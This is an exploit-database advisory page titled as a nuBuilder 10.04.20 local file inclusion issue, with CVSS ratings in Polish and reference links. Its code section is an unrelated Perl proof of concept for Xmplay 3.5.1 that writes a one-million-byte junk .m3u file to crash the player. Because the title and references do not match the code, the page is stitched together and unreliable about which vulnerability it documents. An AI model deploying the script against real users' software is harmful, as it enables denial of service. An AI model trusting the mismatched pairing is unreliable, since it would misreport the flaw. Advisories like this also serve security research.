nuBuilder 10.04.20 Local File Inclusion Vulnerability

2010.08.04
Credit: John Leitch
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


Ogólna skala CVSS: 6.8/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

#!/usr/bin/perl # Xmyplay 3.5.1 # Author: s-dz , s-dz@hotmail.fr # Download : http://us2.un4seen.com/files/xmplay35.zip # Tested : Windows XP SP2 (fr) # DATE : 2010-07-31 my $file= "mahboul-3lik00.m3u"; my $junk= "\x41" x 1000000; open($FILE, ">$file"); print($FILE $junk); close($FILE); print("exploit created successfully");

Referencje:

http://www.nubuilder.com/nubuilderwww/change.php?changelog_id=14c3d1ea2a9fab
http://xforce.iss.net/xforce/xfdb/60138
http://www.vupen.com/english/advisories/2010/1726
http://www.securityfocus.com/bid/41404
http://www.osvdb.org/66006
http://secunia.com/advisories/40483
http://packetstormsecurity.org/1007-exploits/nubuilder-lfi.txt
http://cross-site-scripting.blogspot.com/2010/07/nubuilder-100420-local-file-inclusion.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top